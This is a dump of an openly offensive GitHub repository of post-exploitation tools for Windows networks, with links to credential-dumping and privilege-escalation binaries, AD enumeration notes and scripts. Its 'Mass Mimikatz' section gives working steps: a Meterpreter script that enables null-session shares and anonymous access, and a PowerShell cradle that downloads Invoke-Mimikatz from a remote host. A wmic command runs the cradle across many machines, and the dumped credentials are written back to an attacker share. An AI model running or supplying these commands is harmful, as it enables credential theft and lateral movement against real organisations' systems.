├── .github
└── FUNDING.yml
├── .gitignore
├── README.md
├── scripts
├── getout.py
├── mass_mimikatz
│ ├── massmimi_reg.rb
│ ├── powermeup.cmd
│ └── readme.md
├── powershell
│ └── list_local_admins_remote_hosts.ps1
└── readme.md
├── win32bins
├── LGPO.exe
├── RunAsCurrentUser-2.0.3.1.exe
├── activedirectory
│ ├── VSSVC.exe
│ ├── adfind.exe
│ ├── bitsadmin32.exe
│ ├── csvde.exe
│ ├── dnscmd.exe
│ ├── dsget.exe
│ ├── dsquery.exe
│ ├── nltest32.exe
│ ├── readme.md
│ └── vssadmin.exe
├── binary
│ ├── bintext.exe
│ ├── rar.exe
│ ├── sdelete.exe
│ ├── strings.exe
│ └── upx.exe
├── database
│ ├── gui
│ │ ├── heidisql.exe
│ │ └── libmysql.dll
│ ├── osql.exe
│ └── sqlcmd.exe
├── dmc.exe
├── grep.exe
├── gui
│ ├── baregrep.exe
│ ├── baretail.exe
│ ├── hxd.exe
│ ├── scite.exe
│ └── servifythis.exe
├── mygrep
│ ├── mygrep.c
│ ├── mygrep.exe
│ ├── scan.h
│ └── show_dump.h
├── network
│ ├── letmeoutofyournet
│ │ ├── w00tw00t_incremental.au3
│ │ └── w00tw00t_incremental.exe
│ ├── ncat.exe
│ ├── plink.exe
│ ├── plink_novrfy.exe
│ ├── readme.creole
│ ├── remote.exe
│ ├── sbd.exe
│ ├── showmount.exe
│ ├── tcping.exe
│ ├── wget.exe
│ └── zebedee.exe
├── ntrights.exe
├── privesc.exe
├── psexec.exe
├── rawcap.exe
├── regedit_nogpo.exe
└── requires_cygwin
│ ├── cygcrypto-0.9.8.dll
│ ├── cyggcc_s-1.dll
│ ├── cygminires.dll
│ ├── cygssp-0.dll
│ ├── cygwin1.dll
│ ├── cygz.dll
│ ├── scp.exe
│ ├── ssh-agent.exe
│ ├── ssh-keygen.exe
│ └── ssh.exe
└── win64bins
├── bitsadmin64.exe
├── dsacls.exe
├── en-US
└── dsacls.exe.mui
├── nltest64.exe
├── runhash64.exe
├── showmount.exe
└── wce64.exe
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | patreon: mubix
2 | liberapay: mubix
3 | custom: ['https://paypal.me/mubix']
4 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | #################
3 | ## Eclipse
4 | #################
5 |
6 | *.pydevproject
7 | .project
8 | .metadata
9 | bin/**
10 | tmp/**
11 | tmp/**/*
12 | *.tmp
13 | *.bak
14 | *.swp
15 | *~.nib
16 | local.properties
17 | .classpath
18 | .settings/
19 | .loadpath
20 |
21 | # External tool builders
22 | .externalToolBuilders/
23 |
24 | # Locally stored "Eclipse launch configurations"
25 | *.launch
26 |
27 | # CDT-specific
28 | .cproject
29 |
30 | # PDT-specific
31 | .buildpath
32 |
33 |
34 | #################
35 | ## Visual Studio
36 | #################
37 |
38 | ## Ignore Visual Studio temporary files, build results, and
39 | ## files generated by popular Visual Studio add-ons.
40 |
41 | # User-specific files
42 | *.suo
43 | *.user
44 | *.sln.docstates
45 |
46 | # Build results
47 | **/[Dd]ebug/
48 | **/[Rr]elease/
49 | *_i.c
50 | *_p.c
51 | *.ilk
52 | *.meta
53 | *.obj
54 | *.pch
55 | *.pdb
56 | *.pgc
57 | *.pgd
58 | *.rsp
59 | *.sbr
60 | *.tlb
61 | *.tli
62 | *.tlh
63 | *.tmp
64 | *.vspscc
65 | .builds
66 | **/*.dotCover
67 |
68 | ## TODO: If you have NuGet Package Restore enabled, uncomment this
69 | #**/packages/
70 |
71 | # Visual C++ cache files
72 | ipch/
73 | *.aps
74 | *.ncb
75 | *.opensdf
76 | *.sdf
77 |
78 | # Visual Studio profiler
79 | *.psess
80 | *.vsp
81 |
82 | # ReSharper is a .NET coding add-in
83 | _ReSharper*
84 |
85 | # Installshield output folder
86 | [Ee]xpress
87 |
88 | # DocProject is a documentation generator add-in
89 | DocProject/buildhelp/
90 | DocProject/Help/*.HxT
91 | DocProject/Help/*.HxC
92 | DocProject/Help/*.hhc
93 | DocProject/Help/*.hhk
94 | DocProject/Help/*.hhp
95 | DocProject/Help/Html2
96 | DocProject/Help/html
97 |
98 | # Click-Once directory
99 | publish
100 |
101 | # Others
102 | [Bb]in
103 | [Oo]bj
104 | sql
105 | TestResults
106 | *.Cache
107 | ClientBin
108 | stylecop.*
109 | ~$*
110 | *.dbmdl
111 | # added for RIA/Silverlight projects (a '#' is only a comment at the start of a .gitignore line)
111 | Generated_Code
112 |
113 | # Backup & report files from converting an old project file to a newer
114 | # Visual Studio version. Backup files are not needed, because we have git ;-)
115 | _UpgradeReport_Files/
116 | Backup*/
117 | UpgradeLog*.XML
118 |
119 |
120 |
121 | ############
122 | ## Windows
123 | ############
124 |
125 | # Windows image file caches
126 | Thumbs.db
127 |
128 | # Folder config file
129 | Desktop.ini
130 |
131 |
132 | #############
133 | ## Python
134 | #############
135 |
136 | *.py[co]
137 |
138 | # Packages
139 | *.egg
140 | *.egg-info
141 | dist
142 | build
143 | eggs
144 | parts
145 | bin
146 | var
147 | sdist
148 | develop-eggs
149 | .installed.cfg
150 |
151 | # Installer logs
152 | pip-log.txt
153 |
154 | # Unit test / coverage reports
155 | .coverage
156 | .tox
157 |
158 | #Translations
159 | *.mo
160 |
161 | #Mr Developer
162 | .mr.developer.cfg
163 |
164 | # Mac crap
165 | .DS_Store
166 |
167 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | post-exploitation
2 | =================
3 |
4 | Post Exploitation Collection - This repository is a collection of the post
5 | exploitation voodoo from too many sources to name. The command lists are below
6 | but binaries and scripts have been added to the repo as well. See below for
7 | detail on each of the sections.
8 |
9 | **If you'd like to contribute or just correct a
10 | typo please create a pull request, or complain
11 | at me via the 'issues' system**
12 |
13 | Contributors: [@mubix](http://twitter.com/mubix),yournamehere
14 |
15 | Command Lists
16 | -------------
17 | Post Exploitation commands lists - these were originally a Google Doc as linked
18 | here but have been converted to GitHub markdown. You can now access them via the
19 | Wiki here: https://github.com/mubix/post-exploitation/wiki and check it out locally
20 | for editing using:
21 | ```bash
22 | git clone git@github.com:mubix/post-exploitation.wiki.git
23 | ```
24 |
25 | ### Old lists:
26 | * [Linux/Unix/BSD Post Exploitation](https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit)
27 | * [Windows Post Exploitation](https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit)
28 | * [OSX Post Exploitation](https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit)
29 | * [Obscure System's Post Exploitation](https://docs.google.com/document/d/1CIs6O1kMR-bXAT80U6Jficsqm0yR5dKUfUQgwiIKzgc/edit)
30 | * [Metasploit Post Exploitation](https://docs.google.com/document/d/1ZrDJMQkrp_YbU_9Ni9wMNF2m3nIPEA_kekqqqA2Ywto/edit)
31 |
32 | Disclaimer
33 | ----------
34 | If you are the owner of one of these binaries and
35 | would like it taken down, please create an issue
36 | on Github and it will be removed.
37 |
38 | .msf4 & metasploit scripts
39 | ------
40 | This has moved to "Q" - https://github.com/mubix/q
41 |
42 | win32bins
43 | ----------
44 | 32- or 16-bit binaries - not only for use on 32-bit systems; any that have
45 | a counterpart in win64bins probably have it for a reason
46 |
47 | scripts
48 | --------
49 | All other scripts that don't fit in one of the above categories
50 |
51 | linux
52 | --------
53 | All other *nix related items that don't fit in one of the above categories
54 |
55 | osx
56 | -----
57 | All other OSX related items that don't fit in one of the above categories
58 |
59 | bsd
60 | ----
61 | All other BSD related items that don't fit in one of the above categories
62 |
--------------------------------------------------------------------------------
/scripts/getout.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python -tt
2 |
3 | import sys, socket, urllib2, threading, Queue
4 |
5 | #=================================================
6 | # MAIN FUNCTION
7 | #=================================================
8 |
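def main():
    """Parse the command line and check outbound TCP egress for a set of ports.

    Every port given with ``-p`` (a single port or ``low-high``) is fetched
    over HTTP from letmeoutofyour.net by a pool of ``-t`` worker threads (see
    doWork); results are serialised onto stdout by one printer thread (see
    doPrint). Invalid options end the program through parser.error().
    """
    import optparse
    usage = "%prog [options]\n\n%prog - Tim Tomes (@LaNMaSteR53) (www.lanmaster53.com)"
    parser = optparse.OptionParser(usage=usage)
    parser.add_option('-v', help='Enable verbose mode.', dest='verbose', default=False, action='store_true')
    parser.add_option('-p', help='Port, or range of ports (1-65535).', dest='ports', type='string', action='store')
    parser.add_option('-t', help='Number of threads. (default=5)', dest='threads', type='int', default=5, action='store')
    (opts, args) = parser.parse_args()

    if not opts.ports:
        parser.error("[!] Must provide at least one port.")
    if opts.threads < 1:
        # with no worker threads nothing ever calls q.task_done(), so the
        # q.join() below would block forever
        parser.error("[!] Thread count must be at least 1.")

    ports = _parse_ports(parser, opts.ports)
    verbose = bool(opts.verbose)
    socket.setdefaulttimeout(3)

    print("[*] Checking egress for ports %s." % opts.ports)

    q = Queue.Queue()
    print_q = Queue.Queue()

    for i in range(opts.threads):
        t = threading.Thread(target=doWork, args=(q, print_q, verbose))
        t.daemon = True
        t.start()

    t = threading.Thread(target=doPrint, args=(print_q,))
    t.daemon = True
    t.start()

    for port in ports:
        q.put(port)
    q.join()
    # drain the printer as well: both thread kinds are daemons, so without
    # this the last queued results can be lost when the interpreter exits
    print_q.join()


def _parse_ports(parser, spec):
    """Turn ``'80'`` or ``'1-1024'`` into a list of ints, or exit via parser.error().

    Accepts the same two forms as before but rejects non-numeric text, ports
    outside 1-65535 and inverted ranges instead of raising a bare ValueError
    or silently scanning nothing.
    """
    try:
        if '-' in spec:
            low, high = [int(x) for x in spec.split('-', 1)]
        else:
            low = high = int(spec)
    except ValueError:
        parser.error("[!] Ports must be numeric, e.g. 80 or 1-1024.")
    if not (1 <= low <= high <= 65535):
        parser.error("[!] Port range must be within 1-65535 and ascending.")
    return range(low, high + 1)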
48 |
49 | #=================================================
50 | # SUPPORT FUNCTIONS
51 | #=================================================
52 |
def doPrint(print_q):
    """Printer thread body: serialise worker output onto stdout.

    Blocks on print_q forever (it is started as a daemon thread); each message
    is acknowledged with task_done() before it is written, so a print_q.join()
    caller is not held up by stdout.
    """
    while True:
        message = print_q.get()
        print_q.task_done()
        print(message)
58 |
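def doWork(q, print_q, verbose):
    """Worker thread body: take ports from q and test egress on each one.

    For every port an HTTP GET is sent to yo.letmeoutofyour.net on that port;
    a response body containing 'w00tw00t' means the port is open outbound.
    Results are queued on print_q (see doPrint). Runs until the process exits.
    """
    while True:
        port = q.get()
        try:
            req = urllib2.Request('http://yo.letmeoutofyour.net:%d/hi/mubix' % port)
            try:
                res = urllib2.urlopen(req)
                try:
                    body = res.read()
                finally:
                    res.close()
            except (urllib2.URLError, socket.error):
                # URLError covers refused/unreachable connections; a read that
                # hits the 3 s default timeout raises socket.timeout (a
                # socket.error), which previously escaped and killed the thread
                print_q.put('[-] Port %d blocked.' % port)
            except Exception as e:
                # e.g. a malformed HTTP response: report it rather than
                # silently losing the worker
                print_q.put('[!] Port %d error: %s' % (port, e))
            else:
                if 'w00tw00t' in body:
                    if verbose: print_q.put('[+] Port %d allowed.' % port)
                else:
                    print_q.put('[!] \'w00tw00t\' not returned for port %d.' % port)
        finally:
            # always acknowledge the item, otherwise main's q.join() never returns
            q.task_done()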
73 |
74 | #=================================================
75 | # START
76 | #=================================================
77 |
if __name__ == "__main__":
    # script entry point; importing the module does not start a scan
    main()
79 |
--------------------------------------------------------------------------------
/scripts/mass_mimikatz/massmimi_reg.rb:
--------------------------------------------------------------------------------
# Meterpreter script (client.sys.registry is the stdapi registry API) run on
# the host that exports the 'open' share, presumably so the remote hosts the
# readme launches via wmic can write their output to it without credentials.
# Both registry changes below weaken the host's security posture; they are the
# "registry values" the readme's clean-up step says to remove afterwards.
sharename = 'open'
regmultisz = 7   # REG_MULTI_SZ type id passed to set_value
regdword = 4     # REG_DWORD type id passed to set_value

# 1. LanmanServer\Parameters\NullSessionShares: append the share name if it
#    is not already listed.
key = 'HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters\\'
rootkey, basekey = client.sys.registry.splitkey(key)
open_key = client.sys.registry.open_key(rootkey,basekey,KEY_READ)
begin
  v = open_key.query_value('NullSessionShares')
  open_key.close
  # REG_MULTI_SZ is a run of NUL-terminated strings ended by a double NUL;
  # turn it back into an array of share names.
  currentsetting = v.data.split("\x00\x00")[0].split("\x00")

  if currentsetting.include?(sharename)
    print_good("#{sharename} is already allowed as a NullSessionShare")
  else
    print_status("#{sharename} is not in the NullSessionShares list, adding...")
    open_key = client.sys.registry.open_key(rootkey, basekey, KEY_WRITE)
    if currentsetting.length > 0
      # NOTE(review): print_error is evaluated inside the interpolation, so the
      # settings go out as a separate error line and its return value (not the
      # settings) lands in this message; "#{currentsetting.inspect}" alone
      # looks like what was intended.
      print_status("Current Settings #{print_error(currentsetting.inspect)}")
      csinsert = currentsetting.join("\x00") + "\x00"
    else
      print_status("NullSessionShares is present but blank..")
      csinsert = ""
    end
    # Re-encode the existing entries plus the new one, double-NUL terminated.
    open_key.set_value("NullSessionShares",regmultisz, csinsert + "#{sharename}\x00\x00")
    open_key.close
  end
rescue Rex::Post::Meterpreter::RequestError
  # query_value failed, taken to mean the value does not exist yet.
  # NOTE(review): the KEY_READ handle opened above is not closed on this path.
  print_status("NullSessionShares value isn't present, creating and adding #{sharename}")
  open_key = client.sys.registry.open_key(rootkey, basekey, KEY_WRITE)
  open_key.set_value("NullSessionShares",regmultisz,"#{sharename}\x00\x00")
  open_key.close
end

# 2. Lsa\EveryoneIncludesAnonymous = 1 (Windows then treats anonymous logons
#    as members of Everyone, so the share's Everyone grant applies to them).
key = 'HKLM\\System\\CurrentControlSet\\Control\\Lsa'
rootkey, basekey = client.sys.registry.splitkey(key)
open_key = client.sys.registry.open_key(rootkey,basekey,KEY_READ)
begin
  v = open_key.query_value('EveryoneIncludesAnonymous')
  open_key.close
  if v.data != 1
    print_status("EveryoneIncludesAnonymous currently set to #{v.data}, setting to: 1")
    open_key = client.sys.registry.open_key(rootkey, basekey, KEY_WRITE)
    open_key.set_value("EveryoneIncludesAnonymous",regdword,1)
    open_key.close
  else
    print_good("EveryoneIncludesAnonymous is already set correctly.")
  end
rescue
  # NOTE(review): a bare rescue catches every StandardError, not just the
  # "value missing" RequestError handled in block 1, so an unrelated failure
  # is reported as a missing value and followed by a write. The KEY_READ
  # handle is also left open on this path.
  print_status("EveryoneIncludesAnonymous value isn't present, creating and setting to: 1")
  open_key = client.sys.registry.open_key(rootkey, basekey, KEY_WRITE)
  open_key.set_value("EveryoneIncludesAnonymous",regdword,1)
  open_key.close
end
55 |
--------------------------------------------------------------------------------
/scripts/mass_mimikatz/powermeup.cmd:
--------------------------------------------------------------------------------
REM Stage script placed on the 'open' share and started on each target by the
REM wmic command in readme.md: fetches Invoke-Mimikatz.ps1 from the listener
REM on 192.168.1.127:8080, runs it in memory and redirects stdout and stderr
REM to \\192.168.1.127\open\%COMPUTERNAME%.txt.
REM From the defender's side this is the textbook IEX/DownloadString download
REM cradle that PowerShell script block logging (Event ID 4104) records.
REM NOTE(review): the double quote after "powershell" is never closed.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1
--------------------------------------------------------------------------------
/scripts/mass_mimikatz/readme.md:
--------------------------------------------------------------------------------
1 | # Mass Mimikatz
2 |
3 | 1. Make Share:
4 | ```
5 | cd\
6 | mkdir open
7 | net share open=C:\open /grant:everyone,full
8 | icacls C:\open\ /grant Everyone:(OI)(CI)F /t
9 | ```
10 |
11 | 2. Set registry keys ([massmimi_reg.rb](https://raw.github.com/mubix/post-exploitation/master/scripts/mass_mimikatz/massmimi_reg.rb) meterpreter script):
12 | ```
13 | reg change HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ open
14 | reg change HKLM\System\CurrentControlSet\Control\Lsa "EveryoneIncludesAnonymous" 1
15 | ```
16 |
17 | 3. Change directory into new "open" directory
18 |
19 | 4. Upload powershell script ([powermeup.cmd](https://raw.github.com/mubix/post-exploitation/master/scripts/mass_mimikatz/powermeup.cmd)):
20 | ```
21 | powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1
22 | ```
23 |
24 | 5. Upload [clymb3r](http://clymb3r.wordpress.com/)'s Invoke-Mimikatz ps1 - Download from [PowerSploit](https://github.com/mattifestation/PowerSploit) repo: [source on github](https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1)
25 |
26 | 6. Upload mongoose: [Downloads Page](http://cesanta.com/downloads.html) - Both regular and tiny versions work
27 |
28 | 7. Upload serverlist.txt - This is a line by line list of computer names to use mimikatz on.
29 |
30 | 8. Execute mongoose (from directory with mimikatz.ps1) - This will start a listener with directory listings enabled on port 8080 by default
31 |
32 | 9. Execute wmic:
33 | ```
34 | wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"
35 | ```
36 |
37 | 9a. Execute wmic with creds:
38 | ```
39 | wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"
40 | ```
41 |
42 |
43 | ## clean up:
44 |
45 | 1. kill mongoose process
46 | 2. net share open /delete
47 | 3. kill registry values
48 | 4. delete "open" directory
49 |
--------------------------------------------------------------------------------
/scripts/powershell/list_local_admins_remote_hosts.ps1:
--------------------------------------------------------------------------------
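function get-localadmin {
    <#
    .SYNOPSIS
    Lists the members of the local Administrators group on a remote host via WMI.
    .DESCRIPTION
    Queries Win32_GroupUser on $strcomputer, keeps the associations whose
    GroupComponent ends in "Administrators" and emits each member as
    DOMAIN\Name. Useful for auditing who holds local admin rights on a host.
    .PARAMETER strcomputer
    Host name to query; the caller's own credentials are used for the WMI call.
    .OUTPUTS
    System.String, one DOMAIN\Name per member.
    #>
    param ($strcomputer)
    $admins = Gwmi win32_groupuser -computer $strcomputer
    $admins = $admins | ? { $_.groupcomponent -like '*"Administrators"' }
    $admins | % {
        # Emit only when the regex matched. The original redirected the match
        # result to the undefined variable $nul (a typo for $null) and then
        # read $matches unconditionally, which on a non-matching row repeats
        # the previous row's stale DOMAIN\Name.
        if ($_.partcomponent -match '.+Domain\=(.+)\,Name\=(.+)$') {
            $matches[1].trim('"') + "\" + $matches[2].trim('"')
        }
    }
}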
10 |
--------------------------------------------------------------------------------
/scripts/readme.md:
--------------------------------------------------------------------------------
1 | # Man page for scripts directory
2 |
3 | ## getout.py - date/version added (Aug 26 2012)
4 | ### src:
5 | http://ptscripts.googlecode.com/svn/trunk/getout.py
6 | ### description:
7 | Python script by Tim Tomes that uses LetMeOutOfYour.net
8 | to determine which ports are blocked outbound.
9 | ### usage (test first 1000 ports):
10 | python getout.py -p 1-1000
11 |
--------------------------------------------------------------------------------
/win32bins/LGPO.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/LGPO.exe
--------------------------------------------------------------------------------
/win32bins/RunAsCurrentUser-2.0.3.1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/RunAsCurrentUser-2.0.3.1.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/VSSVC.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/VSSVC.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/adfind.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/adfind.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/bitsadmin32.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/bitsadmin32.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/csvde.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/csvde.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/dnscmd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/dnscmd.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/dsget.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/dsget.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/dsquery.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/dsquery.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/nltest32.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/nltest32.exe
--------------------------------------------------------------------------------
/win32bins/activedirectory/readme.md:
--------------------------------------------------------------------------------
1 | ## csvde.exe
2 | src: Windows server OS
3 |
4 | ### Usage
5 |
6 | >
7 | **Output most of the AD objects for a domain into a CSV**
8 |
csvde.exe -f domaindump.csv
9 | **Output just Marketing objects to CSV**
10 | csvde -d "ou=marketing,dc=contoso,dc=com" -f marketingobjects.csv
11 |
12 | ## dnscmd.exe
13 | src: Picked off any Windows server OS with DNS role installed
14 |
15 | ### Usage
16 |
17 | >
18 | **Enum available zones**
19 | dnscmd /EnumZones
20 | **Print entire zone**
21 | dnscmd /ZonePrint domain.com
22 | If these commands are not run on the DNS server itself, a server can be specified between the command and the option, like so:
23 | dnscmd dc1.domain.com /EnumZones
24 |
25 | ## adfind.exe
26 | src: http://www.joeware.net/freetools/tools/adfind/index.htm
27 |
28 | ### Usage
29 |
30 | >
31 | **List all domains in forest**
32 | adfind -sc domainlist
33 | **List all the trusts for the current domain/forest**
34 | adfind -sc trustdmp
35 | **List domain controllers**
36 | adfind -sc dclist
37 | **List domain controllers for another domain**
38 | adfind -b dc=trusted,dc=otheraddomain,dc=clickycompany,dc=com -sc dclist
39 |
40 | ## nltest.exe
41 | src: Windows OS
42 |
43 | ### Usage
44 |
45 | >
46 | **List all domains current domain trusts**
47 | nltest /domain_trusts
48 |
--------------------------------------------------------------------------------
/win32bins/activedirectory/vssadmin.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/activedirectory/vssadmin.exe
--------------------------------------------------------------------------------
/win32bins/binary/bintext.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/binary/bintext.exe
--------------------------------------------------------------------------------
/win32bins/binary/rar.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/binary/rar.exe
--------------------------------------------------------------------------------
/win32bins/binary/sdelete.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/binary/sdelete.exe
--------------------------------------------------------------------------------
/win32bins/binary/strings.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/binary/strings.exe
--------------------------------------------------------------------------------
/win32bins/binary/upx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/binary/upx.exe
--------------------------------------------------------------------------------
/win32bins/database/gui/heidisql.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/database/gui/heidisql.exe
--------------------------------------------------------------------------------
/win32bins/database/gui/libmysql.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/database/gui/libmysql.dll
--------------------------------------------------------------------------------
/win32bins/database/osql.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/database/osql.exe
--------------------------------------------------------------------------------
/win32bins/database/sqlcmd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/database/sqlcmd.exe
--------------------------------------------------------------------------------
/win32bins/dmc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/dmc.exe
--------------------------------------------------------------------------------
/win32bins/grep.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/grep.exe
--------------------------------------------------------------------------------
/win32bins/gui/baregrep.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/gui/baregrep.exe
--------------------------------------------------------------------------------
/win32bins/gui/baretail.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/gui/baretail.exe
--------------------------------------------------------------------------------
/win32bins/gui/hxd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/gui/hxd.exe
--------------------------------------------------------------------------------
/win32bins/gui/scite.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/gui/scite.exe
--------------------------------------------------------------------------------
/win32bins/gui/servifythis.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/gui/servifythis.exe
--------------------------------------------------------------------------------
/win32bins/mygrep/mygrep.c:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright 2012 Luigi Auriemma
3 |
4 | This program is free software; you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation; either version 2 of the License, or
7 | (at your option) any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program; if not, write to the Free Software
16 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
17 |
18 | http://www.gnu.org/licenses/gpl-2.0.txt
19 | */
20 |
21 | #include
22 | #include
23 | #include
24 | #include
25 | #include
26 | #include "show_dump.h"
27 |
28 | #ifdef WIN32
29 | #include
30 | #else
31 | #define strnicmp strncasecmp
32 | #endif
33 |
34 | typedef unsigned char u8;
35 |
36 |
37 |
38 | #define VER "0.1"
39 |
40 |
41 |
42 | int cstring(u8 *input, u8 *output, int maxchars, int *inlen);
43 | u8 *base64_encode(u8 *data, int *size);
44 | u8 *byte2hex(u8 *data, int *size);
45 | int find(u8 *fname, u8 *buff, int buffsz, u8 *string, int stringsz, int adiacent, int case_sensitive);
46 | int mymemicmp(u8 *a, u8 *b, int len);
47 | u8 *fdload(u8 *fname, int *fsize);
48 | void std_err(void);
49 |
50 |
51 |
/* Command-line state set once in main() and read by mygrep(); declared
   before scan.h is included. */
int g_sparse    = 0;    /* -a: also run the adiacent and sparse passes */
int g_sensitive = 0;    /* -I: case sensitive matching */
int verbose     = 0;    /* -v: print each input path as it is queued */
int g_stringsz  = 0;    /* length of g_string after cstring() expanded its escapes */
u8 *g_string    = NULL; /* search pattern, a strdup() of the argv entry */
57 |
58 |
59 |
60 | #include "scan.h"
61 | int mygrep(u8 *fname);
62 |
63 |
64 |
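/*
 * Entry point: parses the options, builds the search pattern and runs
 * mygrep() over every file named on the command line (folders are walked by
 * recursive_dir() from scan.h). The total number of hits goes to stderr.
 *
 * Options: -I case sensitive, -a adiacent/sparse passes too, -v verbose.
 * The first non-option argument is the pattern (C escapes are expanded by
 * cstring()); every following argument is a file or folder.
 */
int main(int argc, char *argv[]) {
    static u8 filedir[4096];    /* path scratch buffer, handed with its size to recursive_dir() */
    files_t *files;
    unsigned found;
    int i,
        input_total_files;

    fputs("\n"
        "mygrep " VER "\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web: aluigi.org\n"
        "\n", stderr);

    if(argc < 3) {
        printf("\n"
            "Usage: %s [options] ...\n"
            "\n"
            "Options:\n"
            "-I case sensitive only\n"
            "-a allow the adiacent and sparse search too\n"
            "-v verbose\n"
            "\n", argv[0]);
        exit(1);
    }

    /* options are single letters prefixed by '-' or '/'; the first argument
       that does not look like one ends the option list */
    for(i = 1; i < argc; i++) {
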